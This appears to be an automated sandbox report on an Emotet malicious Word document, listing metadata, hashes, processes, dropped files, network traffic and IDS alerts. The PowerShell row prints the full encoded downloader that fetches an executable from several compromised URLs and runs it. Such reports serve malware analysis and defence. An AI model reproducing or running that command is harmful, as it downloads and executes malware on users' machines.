download: | XdMOLGXYGfRWgazukFjJgqUGokvVNN |
Full analysis: | https://app.any.run/tasks/f448007f-3dfe-47f4-9e7b-94b9d384bda6 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 19:04:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Knoll, Subject: Rubber, Author: Daryl Kiehn, Keywords: Fields, Comments: Rubber, Template: Normal.dotm, Last Saved By: Bryce Harber, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 17:49:00 2019, Last Saved Time/Date: Wed Oct 9 17:49:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0 |
MD5: | 40C18DFA04993A800F3F756EF78C29FC |
SHA1: | 1929B2712A81C2377F9D2832FBDCC5EFBC8F18EA |
SHA256: | 8FD04CE2418FC4BAF9EBDE360FA250CBAFAD34DD67DEA5AFE4F317779679DFF2 |
SSDEEP: | 6144:ZRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46dis:ZRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRd9 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Schroeder |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 205 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Grant Group |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 176 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:09 16:49:00 |
CreateDate: | 2019:10:09 16:49:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Bryce Harber |
Template: | Normal.dotm |
Comments: | Rubber |
Keywords: | Fields |
Author: | Daryl Kiehn |
Subject: | Rubber |
Title: | Knoll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2908 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\XdMOLGXYGfRWgazukFjJgqUGokvVNN.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3052 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADEANgA1AGIAOAAwADAANAAyADAAPQAnAGMAMgA1AGIANwAwADcANgA4AGMAOAAnADsAJAB4ADMAeABjADkAOQA1ADQAOAAwAHgAIAA9ACAAJwAyADQAOQAnADsAJAB4ADUANQAxADEANwAwADcANwA2ADUAYgA9ACcAYgA4AHgAMQBiADgAMABjADAANwAyADIAMAAnADsAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAAzAHgAYwA5ADkANQA0ADgAMAB4ACsAJwAuAGUAeABlACcAOwAkAHgAMAAxAGMAMgAwADQAMABiADYANQA9ACcAYwAwADgANQAyADAAYwAwAGIANABjACcAOwAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBFAGIAQwBMAGkARQBOAHQAOwAkAGIAMABjADAAOQA5ADIAMAA2ADQAeAAxADAAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAG8AcAByAGUAdAB0AHkAaABhAGkAcgBsAGwAYwAuAGMAbwBtAC8AdwBlAGwAYwBvAG0AZQAyAC8AaQByAGMAWQBkAGoAZQB3AFAAdAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AegBoAGkAegBhAGkAcwBpAGYAYQBuAGcALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAGYAZQBuAGMAZQAvAGQATABqAFAAVAB6AHkAbAAvAEAAaAB0AHQAcAA6AC8ALwBmAHUAdAB1AHIAZQAtAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEQARABiAFYAYwBMAFAAdgB6AC8AQABoAHQAdABwAHMAOgAvAC8AaQBtAHQAZwBsAG8AYgBhAGwAcwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwA1ADMAZQBmADAAdQA3AGYAbABfADQAeQAzAG0AeABtAGIAMABmAC0ANQA0AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdgBhAHMAdAB1AHYAaQBkAHkAYQBhAHIAYwBoAGkAdABlAGMAdABzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBNAFgAUQB4AGcARgBaAEUALwAnAC4AIgBTAFAATABgAGkAdAAiACgAJwBAACcAKQA7ACQAYwA2ADAAMAAwADkAMwAzADYANwAxADAAPQAnAGMAOQAwADkANwA1ADcANgAwADAAMAAwADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAMAAwADAAMQAwADkANgA4ADQAOAAgAGkAbgAgACQAYgAwAGMAMAA5ADkAMgAwADYANAB4ADEAMAApAHsAdAByAHkAewAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgALgAiAGQAbwBXAE4ATABgAG8AYQBgAEQARgBJAGwARQAiACgAJABiADAAMAAwADEAMAA5ADYAOAA0ADgALAAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQA7ACQAYwA2AHgAMAAwAHgAMAB4AGMANwAwAD0AJwB4ADMANAA1AHgAeAAxADIAYwA5ADYAMAAwACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQAuACIATABFAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADIANgA0ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwApADsAJAB4ADAAOQB4AHgANgBiAGMAYgA1ADAAeAA4AD0AJwBjADgAOAAzADcANgAzADAAMABiAHgAJwA7AGIAcgBlAGEAawA7ACQAYgBiADAAOQAyAGIAeAA3AHgAMAAwADgAMgA9ACcAYgBjAGMANwAzADcAOQBiADEAMAAwADQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwAwAHgAOAAyADgAeAA2AGIAMAA3AD0AJwBjADAAMAA4ADMAMwAwADIAMAAwADQANgAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4EF8.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3052 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0GOWIRCNGFZGK3CDDXUV.temp | — | |
MD5:— | SHA256:— | |||
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9303A9D.wmf | wmf | |
MD5:1072F06BE6E1D176E71E0052BF0E20D0 | SHA256:486EF451450F2D936FA195438807CC0EF804335F85690691B5EBA8B038DB8A7B | |||
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\452EEAAF.wmf | wmf | |
MD5:C67BE3EFE8EFB93BE36C4A417A612093 | SHA256:A06C0C8F597584BDC5E59AEEEDE1B5151D9726C97ACB23481E881209A3972033 | |||
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$MOLGXYGfRWgazukFjJgqUGokvVNN.doc | pgc | |
MD5:F3CBB64365BAD7D6D5385FC0A195FE19 | SHA256:F17376694950FBD7779D64AF10B78DD621C7467F6DF8B7D69A61A51B2A00F8A4 | |||
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\335883B3.wmf | wmf | |
MD5:74BDE68E29D389104763216CCA513FA3 | SHA256:0755F2494EBA3CDFD0617FA5247B73F0AC82A5F8B637E3FF6B3E168EB69C6720 | |||
2908 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1FDE0F7D27D0DEEB0E01F88352F8A2C8 | SHA256:AFCD4A7E9156DE74CA15024ECE1C1AA146506203C4B9F55F79014C0C676AF0BF | |||
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:D84911D9A4ED323A1EA06B6EAA119E13 | SHA256:3801DA90160540364396E75E524103453447E22AC66C65FB975A2EC8A8268277 | |||
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9904AB39.wmf | wmf | |
MD5:49C5D718F641C17D725BD20C4DE3C461 | SHA256:C957EBE630668E014AB6BA4346E6F5368873D72E3280405D61395E926EE6A0F0 | |||
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C82287FA.wmf | wmf | |
MD5:3A5B765E2D565595E3777151B0A50B80 | SHA256:03F7EB60405A0124ED54D7EAEBD7169D8B6C8E7D86703C983F54DD97E9D45371 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3052 | powershell.exe | GET | — | 43.255.154.97:80 | http://future-maintenance.com/wp-content/DDbVcLPvz/ | SG | — | — | suspicious |
3052 | powershell.exe | GET | 301 | 45.56.100.50:80 | http://www.soprettyhairllc.com/welcome2/ircYdjewPt/ | US | html | 162 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3052 | powershell.exe | 45.56.100.50:80 | www.soprettyhairllc.com | Linode, LLC | US | unknown |
3052 | powershell.exe | 45.56.100.50:443 | www.soprettyhairllc.com | Linode, LLC | US | unknown |
3052 | powershell.exe | 47.110.40.3:443 | www.zhizaisifang.com | — | CN | unknown |
3052 | powershell.exe | 43.255.154.97:80 | future-maintenance.com | GoDaddy.com, LLC | SG | suspicious |
Domain | IP | Reputation |
---|---|---|
www.soprettyhairllc.com |
| unknown |
www.zhizaisifang.com |
| unknown |
future-maintenance.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3052 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3052 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3052 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |